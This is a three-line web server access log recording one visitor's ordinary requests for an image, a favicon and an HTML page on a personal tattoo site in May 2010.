70.191.94.116 - - [11/May/2010:17:00:28 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
